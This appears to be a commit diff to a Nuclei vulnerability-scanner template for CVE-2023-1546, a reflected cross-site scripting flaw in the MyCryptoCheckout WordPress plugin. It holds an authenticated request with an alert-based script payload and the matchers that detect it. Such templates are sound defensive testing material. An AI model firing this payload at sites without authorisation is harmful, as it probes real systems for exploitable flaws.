updated payload,matcher,info

http/cves/2023/CVE-2023-1546.yaml

@@ -1,16 +1,20 @@
 id: CVE-2023-1546
 
 info:
-  name: MyCryptoCheckout < 2.124 - Reflected XSS
+  name: MyCryptoCheckout < 2.124 - Cross-Site Scripting
   author: Harsh
   severity: medium
   description: |
     The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting
   reference:
     - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1546
   classification:
     cve-id: CVE-2023-1546
-  tags: wpscan,cve2023,wordpress,authenticated,cve,wp-plugin,xss
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2023,Wordpress,wp,wp-plugin,xss,wpscan,authenticated
 
 http:
   - raw:
@@ -20,12 +24,11 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In
+
       - |
-        GET /wp-admin/options-general.php?page=mycryptocheckout&%22%3E%3Cscript%3Ealert(007)%3C/script%3E HTTP/1.1
+        GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> HTTP/1.1
         Host: {{Hostname}}
 
-
-
     cookie-reuse: true
     req-condition: true
     matchers:
@@ -33,5 +36,6 @@ http:
         dsl:
           - 'status_code_2 == 200'
           - 'contains(header_2, "text/html")'
-          - 'contains(body_2, "scriptalert(007)")'
+          - 'contains(body_2, "scriptalert(/XSS/)/script")'
+          - 'contains(body_2, "mycryptocheckout")'
         condition: and